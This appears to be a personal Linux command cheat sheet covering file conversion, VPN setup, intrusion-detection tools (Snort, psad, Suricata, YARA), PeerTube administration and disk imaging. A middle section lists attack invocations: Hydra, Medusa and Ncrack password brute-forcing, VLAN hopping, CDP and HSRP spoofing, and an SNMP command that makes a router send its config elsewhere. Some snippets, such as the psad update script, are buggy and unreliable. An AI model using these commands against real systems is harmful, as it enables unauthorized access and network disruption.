##   [+] Save an HTML page, and covert it to a .pdf file
##-========================================================-##
wget $URL | htmldoc --webpage -f "$URL".pdf - ; xpdf "$URL".pdf &


##-========================================================-##
##   [+] get all pdf and zips from a website using wget
##-========================================================-##
wget --reject html,htm --accept pdf,zip -rl1 $URL


##-==========================================-##
##   [+] Create a pdf version of a manpage
##-==========================================-##
man -t $Man | ps2pdf - $File.pdf


# make image semi-transparent
convert $File.png -alpha set -channel A -fx 0.5 $File.png

convert
convert -size 640x480


# Convert images to a multi-page pdf
convert -adjoin -page A4 *.jpeg $File.pdf


gm mogrify -format png *.webp       ## Convert webp --> PNG
gm mogrify -format jpeg *.webp      ## Convert webp --> JPEG
gm mogrify -format jpeg *.jpg       ## Convert JPG --> JPEG
gm mogrify -format jpg *.png        ## Convert PNG --> JPG
gm mogrify -format jpeg *.png       ## Convert PNG --> JPEG
gm mogrify -format png *.jpeg       ## Convert JPEG --> PNG
gm mogrify -format png *.jpg        ## Convert JPG --> PNG

echo "##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##"
echo "    [+] Convert A Markdown Document To PDF:        "
echo "##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##"
pandoc -o $File.pdf $File.md


echo "##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##"
echo "    [+] Convert Docx to Markdown with Pandoc:"
echo "##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##"
pandoc -s $File.docx -t markdown -o $File.md


echo "##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##"
echo "    [+] Convert Text File --> PDF File:      "
echo "##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##"
pandoc $File.txt -o $File.pdf


echo "##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##"
echo "    [+] Convert Markdown File --> PDF File:      "
echo "##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##"
pandoc $File.md -s -o $Output.pdf               ## create a PDF


echo "##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##"
echo "    [+] EPUB ebook --> PDF:"
echo "##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##"
pandoc $File.epub -o $File.pdf


echo "##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##"
echo "    [+] Convert HTML --> TEXT:         "
echo "##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##"
pandoc -s $File.html -o $File.txt


echo "##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##"
echo "    [+] Convert A Whole Directory of files from Markdown to RTF        "
echo "##-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##"
for f in *.txt; do pandoc "$f" -s -o "${f%.txt}.rtf"; done


##-=============================================================-##
##   [+] use the native ATAPI interface which is found with:
##-=============================================================-##
cdrecord dev=ATAPI ‐scanbus


##-======================================-##
##   [+]
##-======================================-##
cdrecord ‐scanbus
cdrecord dev=ATAPI ‐scanbus


##-======================================-##
##   [+]
##-======================================-##
growisofs ‐dvd‐compat ‐Z /dev/dvd=$File.iso             ## Burn existing iso image
growisofs ‐dvd‐compat ‐Z /dev/dvd ‐J ‐R /p/to/data          ## Burn directly


##-======================================-##
##   [+]
##-======================================-##
pam-auth-update --enable libpam-net-usernet


##-======================================-##
##   [+]
##-======================================-##
for cipher in `openvpn --show-tls | grep TLS-`;
do echo $cipher;
openvpn --client --remote <TargetIP> --auth-user-pass --dev tun --ca ca.crt --auth-nocache --comp-lzo --tls-cipher $cipher;
done


openvpn --client --remote <TargetIP> --auth-user-pass login.conf --dev tun --ca ca.crt --auth-nocache --comp-lzo --tls-cipher <CorrectCipherSuite>

openvpn --client --remote <TargetIP> --auth-user-pass login.conf --dev tun --ca ca.crt --auth-nocache --comp-lzo --tls-cipher <CorrectCipherSuite>


Using tls-auth requires that you generate a shared-secret key

openvpn --genkey --secret ta.key


In the server configuration, add:

    tls-auth ta.key 0

In the client configuration, add:

    tls-auth ta.key 1


##-====================================-##
##   [+] client configuration file:
##-====================================-##
/etc/openvpn/client/corpvpn.conf


systemctl start openvpn-client@corpvpn


##-=============================================================-##
##   [+] view the server configurations journal
##   [+] only listing entries from yesterday and until today:
##-=============================================================-##
journalctl --since yesterday -u openvpn-server@tun0


##-============================================================-##
##   [+] view the OpenVPN journal log use a similar syntax:
##-============================================================-##
journalctl -u openvpn-client@$CONFIGNAME

journalctl -u openvpn-server@$CONFIGNAME


##-==============================================================-##
##  [+] Retrieve dropped connections from firewalld journaling
##-==============================================================-##
journalctl -b | grep -o "PROTO=.*" | sed -r 's/(PROTO|SPT|DPT|LEN)=//g' | awk '{print $1, $3}' | sort | uniq -c


##-=========================================-##
##                      [+] sshuttle VPN:
##-=========================================-##
## ------------------------------------------------------- ##
##  git clone https://github.com/apenwarr/sshuttle
## ------------------------------------------------------- ##
##        [?] sshuttle VPN Inner Workings:
## ------------------------------------------------------- ##
##       > Disassembles TCP Packets,
##       > Sends Them Over SSH,
##       > ReAssembles & Forwards Packets,
## ------------------------------------------------------- ##
sshuttle -r $Username@$SSHServer 0/0


## ------------------------------------------------------------------ ##
##   [?]  Shuttle - Traffic forwarded over SSH:
## ------------------------------------------------------------------ ##
sshuttle -vr user@192.168.207.57 1X0.1X.0.0/16


mkdir /var/log/snort
chown root:snort /etc/snort/snort.conf
chmod 640 /etc/snort/snort.conf
sudo chown -R snort:snort /etc/snort
sudo chown -R snort:snort /var/log/snort


##-======================================================-##
##    [+]  system logger by sending it a SIGUSR1 signal
##-======================================================-##
kill -USR1 `pidof snort`


systemctl enable snort
systemctl enable barnyard2


##-=======================================-##
##   [+] Running Snort In Sniffer Mode:
##-=======================================-##
snort -e            ##  print a summary of the
                        ##  link-level (Ethernet) headers


snort -i eth0 -vde

snort -dve -l $LogFile -c /etc/snort/snort.conf

snort -q -i eth0 -c -A console /etc/snort/snort.conf


snort -vQ -c /usr/local/etc/snort/snort-raj.conf -A fast -h 192.168.3.0/24 -s --daq ipfw --daq-var port=8100 --alert-before-pass

snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0


snort -r $File.pcap -c /etc/snort/snort.read.conf -l .


/usr/sbin/snort -D -c /etc/snort/snort.conf -l /var/log/snort


Printing the pcap

snort --pcap-dir=/$Dir/$File.pcap --pcap-show


bro -r $File.pcap
snort -r $File.pcap -c /etc/snort.conf -l $LogFile


##-=======================================-##
##   [+] Running Snort In logging Mode:
##-=======================================-##
##-===================================-##
##   [+] Running snort with logging
##-===================================-##
snort -A fast -c /etc/snort/snort.conf -i eth0 -k none


##-===================================-##
##   [+]
##-===================================-##
tail -f /var/log/snort/alert


##-=========================================================-##
##    [+]  run as a network intrusion detection system,
##    [+]  binary logging, alerts sent to the system logger:
##-=========================================================-##
snort -c /usr/local/share/rules/snort.conf -b -s


##-===========================-##
##   [+]  Clone the PulledPork Repo:
##-===========================-##
git clone https://github.com/shirkdog/pulledpork.git


##-===========================-##
##   [+]
##-===========================-##
pulledpork.pl -c /etc/pulledpork/pulledpork.conf


sed -i "s/\/usr\/local\/etc\/snort\//\/etc\/snort\//g" /etc/snort/pulledpork.conf
sed -i "s/# enablesid=/enablesid=/g" /etc/snort/pulledpork.conf
sed -i "s/# dropsid=/enablesid=/g" /etc/snort/pulledpork.conf
sed -i "s/# disablesid=/enablesid=/g" /etc/snort/pulledpork.conf
sed -i "s/# modifysid=/enablesid=/g" /etc/snort/pulledpork.conf
sed -i "s/distro=FreeBSD-8-1/distro=Debian-8-4/g" /etc/snort/pulledpork.conf
sed -i "s/# out_path=/out_path=/g" /etc/snort/pulledpork.conf


bro-cut id.resp_p query


Output three columns and convert time values:
       cat conn.log | zeek-cut -d ts id.orig_h id.orig_p

       Output all columns and convert time values with a custom format string:
       cat conn.log | zeek-cut -D "%Y-%m-%d %H:%M:%S"

       Compressed logs must be uncompressed with another utility:
       zcat conn.log.gz | zeek-cut


Daemonlogger is a packet logger and soft tap
developed by Martin Roesch


##-===========================-##
##   [+]
##-===========================-##
fwsnort --update-rules


/usr/sbin/fwsnort
/usr/sbin/snort
/usr/sbin/snort-stat

/etc/fwsnort/fwsnort.conf

/etc/psad/psad.conf

/etc/oinkmaster.conf

/etc/sagan-rules/
/etc/sagan.conf

/etc/snort/rules/
/etc/snort/snort.conf


PsadfifoLog=$(cat /etc/rsyslog.conf | grep psadfifo)


if [ ! -e $PsadfifoLog ];then
    echo "Psadfifo Log Entry Exists!"
    $Psadfifo
else
    echo "kern.info         |/var/lib/psad/psadfifo" >> /etc/rsyslog.conf
fi


echo "would you like to update psad?"
echo -n "UpdatePsad?: "
read UpdatePsad

if [ $UpPsad = "yes" ]; then
    echo "Psad Signatures Updating..."
    psad --sig-update
    fwsnort --update-rules
else
    echo "OK. Psad Will Update Later..."
fi


if [ ! -e $PsadfifoLog ];then
    echo "Psadfifo Log Entry Exists!"
    $Psadfifo
else
    echo "kern.info         |/var/lib/psad/psadfifo" >> /etc/rsyslog.conf
fi


echo "would you like to update psad?"
echo -n "UpdatePsad?: "
read UpdatePsad

if [ $UpPsad = "yes" ]; then
    echo "Psad Signatures Updating..."
    psad --sig-update
    fwsnort --update-rules
else
    echo "OK. Psad Will Update Later..."
fi


psad --Status


Forensics Mode
psad -A


psad --debug


Apparmor profiles
aa-enforce usr.sbin.psad usr.sbin.fwsnort etc.fwsnort.fwsnort.sh


--config /etc/fwsnort/fwsnort.conf
--update-rules
--rules-url http://rules.emergingthreats.net/open/snort-2.9.0/emerging-all.rules
fwsnort --snort-rdir /etc/fwsnort/snort_rules
fwsnort --snort-rfile /etc/fwsnort/snort_rules/
fwsnort --snort-rfile /etc/fwsnort/snort_rules/community-rules/community.rules
--include-perl-triggers


--ipt-script
--ipt-check-capabilities
psad --fw-list
psad --Status
psad --fw-block-ip 144.202.X.X
psad --Flush
--ipt-apply
--ipt-list
--include-type ftp,mysql
--snort-conf
--snort-sid
--ipt-drop


--Ulog
--ulog-nlgroup

--logfile /var/log/fwsnort.log

--verbose

/etc/fwnort/fwsnort.conf
--ipt-script /var/lib/fwnort/fwsnort.sh

fwsnort --snort-sid 1834,2001842 --NFQUEUE --no-ipt-INPUT --no-ipt-OUTPUT


--Conntrack-state


fwsnort --ipt-sync --verbose

fwsnort --snort-sids 2001842 --ipt-drop

fwsnort --snort-sid 2281 --ipt-reset
fwsnort --snort-sid 900001 --ipt-reject
fwsnort --snort-sid 2002763 --ipt-reject
fwsnort --snort-sids 2001842 --ipt-drop
fwsnort --snort-sid 2281 --ipt-drop

fwsnort --snort-sid 2281 --ipt-reset

fwsnort --snort-sid 1332,1336,1338,1339,1341,1342,1360


grep -i metasploit /etc/fwsnort/fwsnort.sh

cp /etc/fwsnort/snort_rules/metasploit.rules /etc/psad/
snort_rules

echo "900001
4;" >> /etc/psad/snort_rule_dl


psad --sig-update

psad --Analyze-msgs

psad --status

psad --status-ip $IP

psad --status-summary

psad --debug

psad --config


/etc/init.d/psad start


psad --fw-dump


psad --fw-block-ip $IP


psad --fw-file $IPTablesRules


##-===============================================-##
##   [+]
##-===============================================-##
psad --fw-analyze


## ----------------------------------------------------------------------------------------------------------------------------------- ##
        psad --fw-list-auto
## ----------------------------------------------------------------------------------------------------------------------------------- ##
        psad --analysis-auto-block
## ----------------------------------------------------------------------------------------------------------------------------------- ##
        psad -A -m $IPTLogFile
## ----------------------------------------------------------------------------------------------------------------------------------- ##
        psad -A -m $IPTLogFile --analysis-fields src:$IP
## ----------------------------------------------------------------------------------------------------------------------------------- ##
        psad -c $PSADConfig -s $SigFile -a $AutoIPFile
## ----------------------------------------------------------------------------------------------------------------------------------- ##
        psad -c /etc/psad/psad.conf -s /etc/psad/signatures -a /etc/psad/auto_dl
## ----------------------------------------------------------------------------------------------------------------------------------- ##


##-===============================================-##
##   [+] Disable FW check
##   [+] Disable local port lookup subroutines
##-=====================COMMIT==========================-##
psad --log-server --no-netstat


## ----------------------------------------------------------------------------------------------------------------------------------- ##
        fwcheck_psad --fw-analyze                   ##  Analyze the local iptables ruleset
## ----------------------------------------------------------------------------------------------------------------------------------- ##
        fwcheck_psad --fw-file                      ## Allow the user to analyze a specific rulset
                                                                    ## from a file rather than the local policy
## ----------------------------------------------------------------------------------------------------------------------------------- ##


##-==========================================-##
##    [+] Specify path to the psad configuration file.
##    [?] By default this is /etc/psad/psad.conf
##-==========================================-##
fwcheck_psad --config /etc/psad/psad.conf


##-===============================================-##
##   [+] Print metadata associated to the rule
##-===============================================-##
yara --print-meta


##-===========================-##
##   [+] Print module data
##-===========================-##
yara --print-module-data


##-===============================================-##
##   [+] Print namespace associated to the rule
##-===============================================-##
yara --print-namespace/etc/snort/rules/


##-=================================-##
##   [+] Print rules statistics
##-=================================-##
yara --print-stats


##-========================================-##
##   [+] Print strings found in the file
##-========================================-##
yara --print-strings


##-==================================================-##
##   [+] Print length of strings found in the file
##-==================================================-##
yara --print-string-length


##-===============================================-##
##   [+] Print the tags associated to the rule
##-===============================================-##
yara --print-tags


##-===============================================-##
##   [+] Scan files in directories recursively
##-===============================================-##
yara --recursive


##-==============================================================-##
##   [+] RULES_FILE contains rules already compiled with yarac
##-==============================================================-##
yara --compiled-rules


##-===============================================-##
##   [+]
##-===============================================-##
Apply rules on /$Dir/rules
to all files on current directory.
Subdirectories are not scanned.
yara /$Dir/rules


##-=========================================================-##
##   [+] Apply rules on /foo/bar/rules to bazfile.
##   [+] Only reports rules tagged as Packer or Compiler.
##-=========================================================-##
yara -t Packer -t Compiler /$Dir/rules bazfile

              Apply rules on /foo/bar/rules to bazfile.  Only reports rules tagged as Packer or Compiler.

##-====================================================================-##
##   [+] Scan all files in the /foo directory and its subdirectories.
##   [+] Rules are read from standard input.
##-====================================================================-##
cat /$Dir/rules | yara -r /foo


##-=============================================================-##
##   [+] Defines three external variables $Var $Var and $Var.
##-=============================================================-##
yara -d $Var=true -d $Var=5 -d $Var="my string" /$Dir/rules bazfile


##-===============================================-##
##   [+]
##-===============================================-##
## ------------------------------------------------------------------------------ ##
##   [?] Apply rules on /foo/bar/rules to bazfile
##   [?] while passing the content of cuckoo_json_report to the cuckoo module.
## ------------------------------------------------------------------------------ ##
yara -x cuckoo=cuckoo_json_report /$Dir/rules bazfile


##-==========================================-##
##   [+] Run yardoc on all our lib files:
##-==========================================-##
yardoc lib/**/*.rb


##-===================-##
##   [+] Suricata
##-===================-##

/etc/suricata/   <--- Configuration Files
/etc/suricata/rules/  <--- Rules
/var/log/suricata/    <--- Log Files
/var/log/suricata/fast.log   <--- Log file with triggered rules


wget http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz
tar zxvf emerging.rules.tar.gz
sudo mkdir /var/lib/suricata/
sudo mv rules /var/lib/suricata/


##-====================================-##
##   [+] edit suricata.yaml and find
##-====================================-##
default-rule-path: /var/lib/suricata/rules


##-=================================================================-##
##   [+] run Suricata against the network interface on your host.
##-=================================================================-##
sudo suricata -c /etc/suricata/suricata.yaml -i eth0


try running Suricata against a test pcap.
I found a pcap with the popular ETERNALBLUE exploit
from the Shadowbrokers / NSA episode.
You could just as easily try triggering Suricata alerts


suricata -c /etc/suricata/suricata.yaml -r ~/enternalblue.pcap
cat /var/log/suricata/fast.log


suricata -c /etc/suricata/suricata.yaml --init-errors-fatal


service xplico start
service xplico stop
xdg-open http://localhost:9876


volafox


##-=========================================================================-##
##   [+] AES-256 Encrypted-To-Base64 Encoded Split Files {Crypto-KungFu}
##-=========================================================================-##

dd if=/dev/urandom of=/mnt/<Drive>/Encrypt bs=<size>M count=2

losetup -e AES256 /dev/loop0 /mnt/<Drive>/Encrypt

mkfs -t ext3 /dev/loop0

mkdir /mnt/<Drive2>

mount -t ext3 /dev/loop0 /mnt/<Drive2>

df -k

mount -t ext3 /mnt/Drive/Encrypt /mnt/<Drive2> -o loop=/dev/loop0,encryption=AES256

split --bytes=<Size> /mnt/<Drive>/Encrypt

cat xa* > Encrypt

mount -t ext3 /mnt/<Drive>/Encrypt /mnt/<Drive2> -o loop=/dev/loop0,encryption=AES256

uuencode -m xaa xaa.html > xaa.html
uuencode -m xab xab.html > xab.html

uudecode -o xaa xaa.html
uudevode -o xab xab.html


##-===============================================-##
##   [+]
##-===============================================-##
voiphopper -i eth0 -c 0


##-===================================================-##
##   [+] CDP Spoof Mode with custom packet (-c 1):
##-===================================================-##
-D (Device ID)
-P (Port ID)
-C (Capabilities)
-L (Platform)
-S (Software)
-U (Duplex)

voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1


##-===================================================-##
##   [+] CDP Spoof Mode with pre-made packet (-c 2)
##-===================================================-##
voiphopper -i eth0 -c 2


##-=====================================-##
##   [+] Avaya DHCP Option Mode (-a):
##-=====================================-##
voiphopper -i eth0 -a


##-=====================================-##
##   [+] VLAN Hop Mode (-v VLAN ID):
##-=====================================-##
voiphopper -i eth0 -v 200


##-========================================-##
##   [+] Nortel DHCP Option Mode (-n):
##-========================================-##
voiphopper -i eth0 -n


##-===================================================-##
##   [+]
##-===================================================-##
voiphopper -i eth0 -v 20


##-===========================================-##
##   [+] Mode to specify the Voice VLAN ID
##-===========================================-##
ace -i eth0 -v 96 -m 00:1E:F7:28:9C:8E


##-==========================================================================-##
##   [+] Mode to auto-discover voice vlan ID in the listening mode for CDP
##-==========================================================================-##
ace -i eth0 -c 0 -m 00:1E:F7:28:9C:8E


##-==========================================================================-##
##   [+] Mode to auto-discover voice vlan ID in the spoofing mode for CDP
##-==========================================================================-##
ace -i eth0 -c 1 -m 00:1E:F7:28:9C:8E


##-===================================================================-##
##   [+]
##-===================================================================-##
ucsniff -i eth0.20 // //


hardening cisco routers - thomas akin


##-========================================================================-##
##   [+] Medusa - initiated against an htaccess protected web directory
##-========================================================================-##
medusa -h $IP -u admin -P $PassFile -M http -m DIR:/admin -T 10


##-=================================-##
##   [+] Ncrack - brute force RDP
##-=================================-##
ncrack -vv --user offsec -P $PassFile rdp://$ip


onesixtyone -c $Strings.txt 192.168.1.1


Hydra

hydra -t 2 -P $PassFile cisco
hydra -t 2 -m $Pass -P $Wordlist.txt cisco-enable


hydra -l $User -P $PassFile.txt -o $File.txt -t 1 -f 127.0.0.1 http-get-form "enviar.php:user=^USER^&pass=^PASS^:Algo esta errado"

hydra -l $User -P $PassFile.txt -o $File.txt -t 1 -f -w 15 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:S=Logado com sucesso"

hydra -l $User -P $PassFile.txt -o $File.txt -t 1 -f 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:Usuario ou senha invalida"

hydra -L users.txt -P $PassFile.txt -o $File.txt localhost http-head /colt/

hydra -l $User -P $PassFile.txt -w 15 localhost ftp


##-=================================-##
##   [+] Hydra - Bruteforce SNMP
##-=================================-##
hydra -P $PassFile.txt -v $IP snmp


##-===========================================-##
##   [+] Hydra - Bruteforce FTP known user
##-===========================================-##
hydra -t 1 -l $User -P /usr/share/wordlists/rockyou.txt -vV $IP ftp


##-====================================================-##
##   [+] Hydra SSH using list of users and passwords
##-====================================================-##
hydra -v -V -u -L $Users.txt -P $PassFile.txt -t 1 -u $IP ssh


##-=============================================================-##
##   [+] Hydra SSH using a known password and a username list
##-=============================================================-##
hydra -v -V -u -L $Users.txt -p "<known password>" -t 1 -u $IP ssh


##-====================================================-##
##   [+] Hydra SSH Against Known username on port 22
##-====================================================-##
hydra $IP -s 22 ssh -l $User -P $PassFile.txt


##-=================================-##
##   [+] Hydra - POP3 Brute Force
##-=================================-##
hydra -l $User -P $PassFile -f $IP pop3 -V


##-================================-##
##   [+] Hydra - SMTP Brute Force
##-================================-##
hydra -P $PassFile $IP smtp -V


##-=============================================================-##
##   [+] Hydra - attack http get 401 login with a dictionary
##-=============================================================-##
hydra -L ./webapp.txt -P $PassFile $IP http-get /admin


##-==========================================================-##
##   [+] Hydra attack Windows Remote Desktop with rockyou
##-==========================================================-##
hydra -t 1 -V -f -l $User -P /usr/share/wordlists/rockyou.txt rdp://$IP


##-=================================================-##
##   [+] Hydra brute force SMB user with rockyou:
##-=================================================-##
hydra -t 1 -V -f -l $User -P /usr/share/wordlists/rockyou.txt $IP smb


##-==================================================-##
##   [+] Hydra brute force a Wordpress admin login
##-==================================================-##
hydra -l $User -P $File.txt $IP -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'


##-=================================-##
##   [+] Cisco Global Exploiter
##-=================================-##
cge.pl -h 192.168.1.1 -v 7


##-===============================================-##
##   [+] Flood network with bogus CDP packets:
##-===============================================-##
cdp -i eth0 -m 0


##-=============================================================-##
##   [+] HSRP Generator - Send spoofed HSRP packets out eth0
##-=============================================================-##
with authword of cisco and group 1
spoofing virtual IP 192.168.1.25 to all routers on subnet

hsrp -d 224.0.0.2 -v 192.168.1.25 -a cisco -g 1 -i eth0


snmpset $IP private.1.3.6.1.4.1.9.2.1.55.171.68.191.135
router-config enterprises.9.2.1.55.192.168.0.25 = "router-config"


##-===========================================-##
##   [+] Enumerate IP adresses in a network
##-===========================================-##
netenum 192.168.1.0/27


##-==========================================-##
##   [+] send and ICMP timestamp request
##-==========================================-##
timestamp -d 192.168.1.1


##-=============================================-##
##   [+] IKE-Scan - scan in aggressive mode
##-=============================================-##
ike-scan -A 192.168.1.1 -v


##-==========================================================================-##
##   [+] Scan for all protocols in both active and passive modes via eth0:
##-==========================================================================-##
ass -A -i eth0


softflowd


chown debian-tor:debian-tor "$TORPIDDIR"

check_torpiddir () {
if test ! -d $TORPIDDIR; then
mkdir -m 02750 "$TORPIDDIR"
chown debian-tor:debian-tor "$TORPIDDIR"
fi
if test ! -x $TORPIDDIR; then
log_action_end_msg 1 "cannot access $TORPIDDIR directory, are you root?"
exit 1
fi
}


mkdir /var/log/privoxy/privoxy{2,3,4,5,6,7,8}
| awk -F ' ' '{print $1}'


refresh_pattern ^(ht|f)tp://.*ubuntu.*/Packages\.(bz2|gz|diff/Index)$ 0
refresh_pattern ^(ht|f)tp://.*ubuntu.*/Release(\.gpg)?$
0
refresh_pattern ^(ht|f)tp://.*ubuntu.*/Sources\.(bz2|gz|diff/Index)$
0
refresh_pattern ^(ht|f)tp://.*ubuntu.*/Translation-it\.bz2)$


##-=================================================-##
##   [+] Granting an additional user read access
##-=================================================-##
setfacl -m u:lisa:r file


##-====================================================================-##
##   [+] Revoking write access from all groups and all named  users
##-====================================================================-##
setfacl -m m::rx file


##-========================================================-##
##   [+] Removing a named group entry from a files ACL
##-========================================================-##
setfacl -x g:staff file


##-================================================-##
##   [+] Copying the ACL of one file to another
##-================================================-##
getfacl file1 | setfacl --set-file=- file2


##-=====================================================-##
##   [+] Copying the access ACL into the Default ACL
##-=====================================================-##
getfacl --access dir | setfacl -d -M- dir


$ # Basic installation
$ cd /var/www/peertube/peertube-latest
$ sudo -u peertube NODE_CONFIG_DIR=/var/www/peertube/config NODE_ENV=production npm run parse-log -- --level debug --not-tags http sql

$ # Docker installation
$ cd /var/www/peertube-docker
$ docker-compose exec -u peertube peertube npm run parse-log -- --level debug --not-tags http sql


# Docker installation
$ cd /var/www/peertube-docker
$ docker-compose exec -u peertube peertube npm run parse-log -- --level info


synchronize a Youtube channel to your PeerTube instance (ensure you have the agreement from the author), you can add a crontab rule (or an equivalent of your OS) and insert these rules (ensure to customize them to your needs):

# Update youtube-dl every day at midnight
0 0 * * * /usr/bin/npm rebuild youtube-dl --prefix /PATH/TO/PEERTUBE/

# Synchronize the YT channel every sunday at 22:00 all the videos published since last monday included
0 22 * * 0 /usr/bin/node /PATH/TO/PEERTUBE/dist/server/tools/peertube-import-videos.js -u '__PEERTUBE_URL__' -U '__USER__' --password '__PASSWORD__' --target-url 'https://www.youtube.com/channel/___CHANNEL__' --since $(date --date="-6 days" +\%Y-\%m-\%d)


peertube auth add -u 'PEERTUBE_URL' -U 'PEERTUBE_USER' --password 'PEERTUBE_PASSWORD'


peertube auth list
┌──────────────────────────────┬──────────────────────────────┐
│ instance                     │ login                        │
├──────────────────────────────┼──────────────────────────────┤
│ 'PEERTUBE_URL'               │ 'PEERTUBE_USER'              │
└──────────────────────────────┴──────────────────────────────┘

generate the first SSL/TLS certificate using Lets Encrypt:

mkdir -p docker-volume/certbot
docker run -it --rm --name certbot -p 80:80 -v "$(pwd)/docker-volume/certbot/conf:/etc/letsencrypt" certbot/certbot certonly --standalone

##  search the log output for your new PeerTubes instance admin credentials
docker-compose logs peertube | grep -A1 root


Obtaining Your Automatically Generated DKIM DNS TXT Record
cat ./docker-volume/opendkim/keys/*/*.txt

##  peertube._domainkey.mydomain.tld.    IN    TXT    ( "v=DKIM1; h=sha256; k=rsa; "
##       "p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0Dx7wLGPFVaxVQ4TGym/eF89aQ8oMxS9v5BCc26Hij91t2Ci8Fl12DHNVqZoIPGm+9tTIoDVDFEFrlPhMOZl8i4jU9pcFjjaIISaV2+qTa8uV1j3MyByogG8pu4o5Ill7zaySYFsYB++cHJ9pjbFSC42dddCYMfuVgrBsLNrvEi3dLDMjJF5l92Uu8YeswFe26PuHX3Avr261n"
##       "j5joTnYwat4387VEUyGUnZ0aZxCERi+ndXv2/wMJ0tizq+a9+EgqIb+7lkUc2XciQPNuTujM25GhrQBEKznvHyPA6fHsFheymOuB763QpkmnQQLCxyLygAY9mE/5RY+5Q6J9oDOQIDAQAB" )  ; ----- DKIM key peertube for mydomain.tld


Create the production database and a peertube user inside PostgreSQL:

cd /var/www/peertube
sudo -u postgres createuser -P peertube

sudo -u postgres createdb -O peertube -E UTF8 -T template0 peertube_prod


gpg --no-armor -o canary.asc --default-sig-expire 183d --clearsign canary.txt


openssl s_client -connect "$1:443" 2>/dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' | openssl x509 -text | grep "DNS:"| tr ',' '\n' | sed 's/\               //' | sed 's/\s//g' | sed 's/DNS://g'

subjects=$(echo -n | openssl s_client -connect "$1:443" 2>/dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' | openssl x509 -text | grep "DNS:" | tr ',' '\n' | sed 's/\               //' | wc -l)


echo "----Creating QEMU Image----"
qemu-img create -f raw "${IMAGE}" 1G
chmod a+rw "${IMAGE}"

echo "----Creating Partition Table----"
echo -e "o\nn\np\n1\n\n\nw" | /sbin/fdisk "${IMAGE}"

echo "----Mounting QEMU Image----"
kpartx -a -s -v "${IMAGE}"
sleep 1

echo "----Creating Filesystem----"
mkfs.ext2 "${DEVICE}"
sync

echo "----Making QEMU Image Mountpoint----"
if [ ! -e "${IMAGE_DIR}" ]; then
    mkdir "${IMAGE_DIR}"
    chown "${USER}" "${IMAGE_DIR}"
fi

echo "----Mounting QEMU Image Partition 1----"
mount "${DEVICE}" "${IMAGE_DIR}"


echo "----Unmounting QEMU Image----"
sync
umount "${DEVICE}"
kpartx -d "${IMAGE}"
losetup -d "${DEVICE}" &>/dev/null
dmsetup remove $(basename "$DEVICE") &>/dev/null


qemu-img info $File.vmdk


VBoxManage clonehd --format VDI $File.vmdk $File.vdi


guestmount -o allow_other -a "$raw_file_short_link" -m /dev/sda1 --ro "$mount_folder"


kpartx -a -s -v "$img" 2>&1


# VirtualBox resize a hard drive image.
#
# This does two steps:
#
#   1. Clone a VMDK file format disk to a VDI file format disk.
#   2. Modify the VDI file format disk by using resize.
#
# Syntax:
#
#     VBoxManage-clone-from-vmdk-to-vdi-then-resize <src> <dst> <megabytes>
#
# Example:
#
#     VBoxManage-clone-from-vmdk-to-vdi-then-resize My.vmdk My.vdi 10000
#
# Contact: Joel Parker Henderson (joel@joelparkerhenderson.com)
# License: GPL
# Updated: 2015-01-25
##

src=$1
dst=$2
megabytes=$3

VBoxManage clonehd "$src" "$dst" –format vdi
VBoxManage modifyhd "$dst" --resize "$megabytes"


##-=============================-##
##   [+] convert vdi to vmdk
##-=============================-##
## ------------------------------------------------------------------------- ##
##   [?] virtualbox v3.2 hard disk conversion to vmware hard disk format
## ------------------------------------------------------------------------- ##
vboxmanage clonehd --format VMDK $SrcImage|$UUID $DstImage


##-========================================-##
##   [+] Clone or rescue a block device
##-========================================-##
ddrescue -v /dev/sda /dev/sdb logfile.log


echo "## ==================================================================== ##"
echo "## ==========  ========== ##"
echo "## ==================================================================== ##"
sudo dd if=/dev/sdb of=/mnt/recovery/$File.dd


echo "## ==================================================================== ##"
echo "## ==== dd will abort on error. Avoid this with the noerror option ==== ##"
echo "## ==================================================================== ##"
sudo dd conv=noerror if=/dev/sdb of=/mnt/recovery/$File.dd


echo "## ==================================================================== ##"
echo "## ============= grab most of the error-free areas ==================== ##"
echo "## ==================================================================== ##"
gddrescue -n /dev/sdb /mnt/recovery/$File.raw rescued.log


echo "## ==================================================================== ##"
echo "## ====== Once you have your bit-for-bit copy, run fsck on it: ======== ##"
echo "## ==================================================================== ##"
fsck /mnt/recovery/$File.dd


echo "## ==================================================================== ##"
echo "## ============ mount the image as a loopback device: ================= ##"
echo "## ==================================================================== ##"
mount -o loop /mnt/recovery/$File.dd /mnt/hdaimage


echo "## ==================================================================== ##"
echo "## ========= Find out where the partitions are with this: ============= ##"
echo "## ==================================================================== ##"
fdisk -lu /mnt/recovery/$File.dd


